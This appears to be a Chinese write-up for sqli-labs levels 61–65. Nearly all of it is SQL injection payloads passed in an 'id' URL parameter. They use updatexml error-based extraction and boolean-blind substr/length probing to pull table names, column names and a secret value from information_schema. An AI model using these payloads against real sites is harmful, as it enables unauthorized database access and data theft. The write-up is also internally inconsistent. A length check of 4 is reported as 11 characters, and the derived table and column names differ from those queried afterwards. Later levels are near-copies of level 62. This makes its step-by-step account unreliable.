第六一关 less-61
步骤一:闭合方式:?id=1')) --+
步骤二:查询数据库
?id=1')) and updatexml(1,concat(1,database()),1) --+
步骤三:查出网站的数据库表名
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)-- +
j921xgvezs
步骤四:查出users表列名
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='j921xgvezs'),0x7e),1)-- +
secret_1TP3
步骤五:获取目标信息
?id=1')) and updatexml(1,concat(0x7e,(select secret_1TP3 from challenges.j921xgvezs),0x7e),1)-- +
aGvsZ8r33lmoQIi7zelcVCit
输入登录框,提交成功
第六二关 less-62
步骤一:闭合方式:?id=1') --+
步骤二:确定表名
?id=1') and length(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1))=10--+
确定表名有10位
步骤三:查询表名
?id=1') and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='8'--+
推出表名为8q4r8rhld3
步骤四:确定列名
?id=1') and length(substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 3,1),1))=4--+
确定第三列列名有11位
步骤五:查询列名
?id=1') and substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 2,1),1,11)='secret_1jo0'--+
推出列名为secret_1jo0
步骤六:确定字段
?id=1') and length(substr((select secret_BP5W from 9zuk28x2yo limit 0,1),1))='24'--+
判断为24位
步骤七:得出字段
?id=1') and substr((select secret_BP5W from 9zuk28x2yo limit 0,1),1,1)='§a§'--+
输入登录框,提交成功
第六三关 less-63
步骤一:闭合方式:?id=1' --+
步骤二:确定表名
?id=1' and length(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1))=10--+
确定表名有10位
步骤三:查询表名
?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='8'--+
推出表名为8q4r8rhld3
步骤四:确定列名
?id=1' and length(substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 3,1),1))=4--+
确定第三列列名有11位
步骤五:查询列名
?id=1' and substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 2,1),1,11)='secret_1jo0'--+
推出列名为secret_1jo0
步骤六:确定字段
?id=1' and length(substr((select secret_BP5W from 9zuk28x2yo limit 0,1),1))='24'--+
判断为24位
步骤七:得出字段
?id=1' and substr((select secret_BP5W from 9zuk28x2yo limit 0,1),1,1)='§a§'--+
输入登录框,提交成功
第六四关 less-64
步骤一:闭合方式:?id=1)) --+
步骤二:确定表名
?id=1)) and length(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1))=10--+
确定表名有10位
步骤三:查询表名
?id=1)) and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='8'--+
推出表名为8q4r8rhld3
步骤四:确定列名
?id=1)) and length(substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 3,1),1))=4--+
确定第三列列名有11位
步骤五:查询列名
?id=1)) and substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 2,1),1,11)='secret_1jo0'--+
推出列名为secret_1jo0
步骤六:确定字段
?id=1)) and length(substr((select secret_BP5W from 9zuk28x2yo limit 0,1),1))='24'--+
判断为24位
步骤七:得出字段
?id=1)) and substr((select secret_BP5W from 9zuk28x2yo limit 0,1),1,1)='§a§'--+
输入登录框,提交成功
第六五关 less-65
步骤一:闭合方式:?id=1") --+
步骤二:确定表名
?id=1") and length(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1))=10--+
确定表名有10位
步骤三:查询表名
?id=1") and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='8'--+
推出表名为8q4r8rhld3
步骤四:确定列名
?id=1") and length(substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 3,1),1))=4--+
确定第三列列名有11位
步骤五:查询列名
?id=1") and substr((select column_name from information_schema.columns where table_name='8q4r8rhld3'limit 2,1),1,11)='secret_1jo0'--+
推出列名为secret_1jo0
步骤六:确定字段
?id=1") and length(substr((select secret_BP5W from 9zuk28x2yo limit 0,1),1))='24'--+
判断为24位
步骤七:得出字段
?id=1") and substr((select secret_BP5W from 9zuk28x2yo limit 0,1),1,1)='§a§'--+
输入登录框,提交成功
扫一扫
15万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
